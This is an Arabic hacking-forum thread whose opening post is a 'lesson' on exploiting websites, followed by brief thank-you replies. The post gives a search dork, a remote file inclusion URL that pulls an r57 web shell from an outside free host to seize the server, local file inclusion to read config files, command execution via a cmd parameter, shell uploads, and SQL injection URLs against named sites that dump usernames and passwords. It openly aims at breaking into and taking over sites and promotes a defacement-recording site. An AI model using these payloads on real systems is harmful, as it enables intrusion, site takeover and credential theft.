الدرس الثاني: حوار حول الثغرات واستغلالها

الدرس الثاني: حوار حول الثغرات واستغلالها


صفحة 1 من 9 123 ... الأخيرةالأخيرة
النتائج 1 إلى 10 من 89

الموضوع: الدرس الثاني: حوار حول الثغرات واستغلالها

  1. #1

    Ham الدرس الثاني: حوار حول الثغرات واستغلالها

    كيف الاحوال جميعا

    درس اليوم بشرح فيه بعض الثغرات

    اللي تفيدنا لما نجي نستهدف موقع
    ونلقي فيه الثغرة نعرف ايه هي وايه استثمارها


    اولا نجي للثغرة المألوفه

    remote file include

    remote يعني تحكم
    file يعني ملف
    include يعني تشمل
    اختصاراها r f i
    يعني ملف للتحكمـ

    ادراج ملف للتحكم

    طيب للتحكم في ايه

    اقولك في الموقع اللي عايزين نخترقوا

    طيب ايه نوع الملف
    بيكون شيل ------ هذ الشيل مرفوع علي استضافه بصيغة txt يتم ربطه بالموقع عن طريق الثغرة
    للتحكم في الموقع والسيرفر كامل
    ---------------------
    اوكـ نجيب ثغرة نطبق عليها

    Dork:


    كود:
    "Powered by Kmita Tell Friend" "allinurl:/kmitat/"
    ..................................

    طيب dork للي ما يعرفها يعني كود البحث عن الثغرة في مواقع البحث
    واللي تحتها هذا هو الكود اللي بنبحث عنوا في غوغل مثلا حتي نري المواقع المصابه به

    نجي للاستثمار او الاستغلال
    بعض الكلمات اللي لما تراها تعرف انها استغلال
    Example:
    Expl:
    Exploit:
    Exploits:
    Expl


    كود:
    http://www.xxx.com/kmitam/htmlcode.p...ttp://xxx.com/ txt?
    نشرح المثال اللي فوق

    http://www.xxx.com عنوان الموقع
    ممكن يكون مكتوب في الثغر
    kmitam
    الاسكريبت المصاب

    = لادراج الشيل

    http://xxx.com/txt?؟




    شيل لو تلاحظون علامة ال بأخر الشيل
    حتي يتم طلب الملف ولابد من وجودها

    طيب معانا الثغرة كيف نشغلها ونجيب من الاخر اقولكـ

    كود:
    http://[url]/kmitam/htmlcode.php?file=http://[shll]/ txt?
    ثغرة الفايل انكلود بتسمح لنا بأدراج شيل علي الموقع المصاب بها

    يعني لو انا عندي موقع اسموا
    www.vbsilver.com
    مركب به اسكريبت اسموا phpp هذا السكريبت به ثغرة من نوع ريموت فايل انكلود
    استغلالها = ?index.php?gap=shll
    طيب عشان اطبقها علي موقعي


    كود:
    www.vbsilver.com/index.php?gap=http://silveeer79.jeeran.com/r57.tx
    t?
    وهذا شيل روسي رافعوا علي استضافه مجانيه بصيغة txt
    'طيب فيه عندنا شيل روسي c99
    وشيل r57
    وشل sniper-sa وشيلات كتيرة

    -Local File Include
    او ...Remote File Disclosure
    اختصارها lfi
    طبعا هي شبيهه بالفايل انكلود
    لكنها تسمح بادراج وقراءة الملفات علي السيرفر المصاب بالثغرة

    بتكون زي كدا
    http://localhost/script/index.php?lfi
    يعني رابط الموقع + السكريبت المصاب + الملف المصاب + تطيبق الاوامر
    مثلا احنا عندنا ع الموقع داله اسمها get وعايزين نقرا الكونفيق تبعها
    بيكون استغلالها زي كذا
    http://localhost/mkportal/index.php?get=config.php
    بمعني ان احنا امرنا السيرفر يقري لنا الكونفيق الموجود بملف get الموجود بالاسكريبت mkportal


    النوع الثالث

    remote command execution

    عملها تطبيق الاوامر علي السيرفر مباشرة
    طبعا راح نخصص دروس لاوامر اللينكس

    مثال عليها

    كود:
    http://www.xxx.com/index.php?cmd=dir
    نشرح المثال
    هذا الموقع مصاب بثغرة الكوماند
    استغلالها بيكون عرض اوامر اللينكس مباشرة علي الموقع المصاب
    وهنا امرنا السيرفر بأحضار الملفات والمجلدات للموقع بالامر dir
    بأمكاننا أمرة باي اوامر


    النوع الرابع
    Upload Shell


    وهي ثغرة مراكز التحميل
    ان وجدت بأمكاننا رفع ملفات خبيثه بصيغة php يعني نرفع الشيل ونضحك علي الموقع
    ثغرة سهلها ولا تحتاج شرح

    لكن بشرحها بالتفصيل فيما بعد


    النوع الخامس

    Remote SQL Injection

    ثغرات خطيرة وانتشرت بكثرة هذة الايام
    لان اغلب مبرمجين php يكتبون الان دوالهم بالسكيول والاتصال مع قواعد البيانات

    ومهمتها سحب اليوزرات وقراءة الملفات
    يعني حسب الثغرة المكتشفه بيكون النتيجه ممكن تجيب لنا باسورد المدير

    مثال لها

    http://www.milw0rm.com/exploits/6350

    وهذا دورك البحث

    d0rk :: "use your mind"
    وهذا الاستغلال


    كود:
    http://www.ajhyip.com/demo/prime/article/comment.php?artid=5+union+select+1,2,3,4,concat_ws(0x3a3a,username,password),6,7,8,9+from+members/*
    او

    كود:
    http://www.ajhyip.com/demo/acme/article/comment.php?artid=5+union+select+1,2,3,4,concat_ws(0x3a3a,username,password),6,7,8,9+from+members/*
    طبعا بتضع الموقع المصاب
    واضغط اوكـ

    وهو بيطلع لك اليوزر نيمـ والباسورد اذا كان الموقع مصاب


    تمني ما يكون فيه غموض

    هذا شرح مبسط لبعض الثغرات اللي راح تقابلك كتير

    وضعتوا لكمـ قبل ان ابدأ باستهداف اختراق المواقع
    حتي نعرف ازاي نستغل اي ثغرة في الاختراق

    ----------------

    راجع الدرس اكتر من مرة فهو مدخلك للدر س القادمـ

    فيديو اليوم


    اللهم صلي على سيدنا محمد ، على عَدد خَلقِك وَعلى قدر عَظَمَتك وعلى قَدرٍ محبتك له .

    سجل إختراقك الأن في Aljyyosh.org بمميزات عديده



    من مواضيعي:


    سُبْحَانَكَ اللَّهُمَّ وبَحَمْدكَ أشْهدُ أنْ لا إلهَ إلا أنْتَ أَسْتَغْفِرُكَ وأتُوبُ إِلَيْكَ

  2. #2

    افتراضي رد: الدرس الثاني: حوار حول الثغرات واستغلالها

    درس مفيد لكن يلزم خبرة في لينوكس و لغات البرمجة للتمكن من الموضوع.
    أرجو افادتنا قدر المستطاع

  3. #3

    افتراضي رد: الدرس الثاني: حوار حول الثغرات واستغلالها

    مشكوور اخوي جهد رائع

  4. #4

    افتراضي رد: الدرس الثاني: حوار حول الثغرات واستغلالها

    يعطيك العافيه

  5. #5

    افتراضي رد: الدرس الثاني: حوار حول الثغرات واستغلالها

    مشكوووووور والله يعطيك الف عافيه

  6. #6

    افتراضي رد: الدرس الثاني: حوار حول الثغرات واستغلالها

    عاشت الاياديييييييييييييييييي

  7. #7

    افتراضي رد: الدرس الثاني: حوار حول الثغرات واستغلالها

    سلمت يداك اخي الكريم ,,,,,,

  8. #8

    افتراضي رد: الدرس الثاني: حوار حول الثغرات واستغلالها

    يسلمووووووووو اديك يا حوووووووووووووووت

    تحياتي
    ALZAAEM


  9. #9

    افتراضي رد: الدرس الثاني: حوار حول الثغرات واستغلالها

    السلام عليكم شكرا جزيلا

    مقدمة ميزة وشرح جيد

    تحياتي

    [shfaf1]http://www6.0zz0.com/2009/07/18/12/290886484.jpg[/shfaf1]

    ^^^^^^^^^^^^^^^^^^^^^^^^
    [shfaf2]http://www.danasoft.com/sig/198771.jpg[/shfaf2]

  10. #10

    افتراضي رد: الدرس الثاني: حوار حول الثغرات واستغلالها

    ألف شكر لكـ
    على الدرس

صفحة 1 من 9 123 ... الأخيرةالأخيرة

المواضيع المتشابهه

  1. اسطوانة الثغرات وطرق اكتشافها واستغلالها
    بواسطة ASDELY-ScOrPiOn في المنتدى قسم الثغرات
    مشاركات: 122
    آخر مشاركة: 02-10-2013, 07:34 AM
  2. الدرس الثاني: فتح البورت 81
    بواسطة ASDELY-ScOrPiOn في المنتدى قسم اختراق الأجهزة
    مشاركات: 91
    آخر مشاركة: 05-14-2012, 07:12 PM
  3. الدرس الثاني شرح أنواع الثغرات ومفاهيمها
    بواسطة ASDELY-ScOrPiOn في المنتدى اختراق المواقع والسيرفرات
    مشاركات: 19
    آخر مشاركة: 11-17-2011, 07:20 PM
  4. الدرس الثاني . فتج بورت لاي مودم كان
    بواسطة جندي اول للهكر في المنتدى قسم اختراق الأجهزة
    مشاركات: 19
    آخر مشاركة: 04-09-2011, 07:36 PM
  5. الدرس الثاني تعليم الـ html
    بواسطة ASDELY-ScOrPiOn في المنتدى لغات برمجة المواقع
    مشاركات: 1
    آخر مشاركة: 08-29-2009, 11:35 PM

المفضلات

أذونات المشاركة

  • لا تستطيع إضافة مواضيع جديدة
  • لا تستطيع الرد على المواضيع
  • لا تستطيع إرفاق ملفات
  • لا تستطيع تعديل مشاركاتك
  •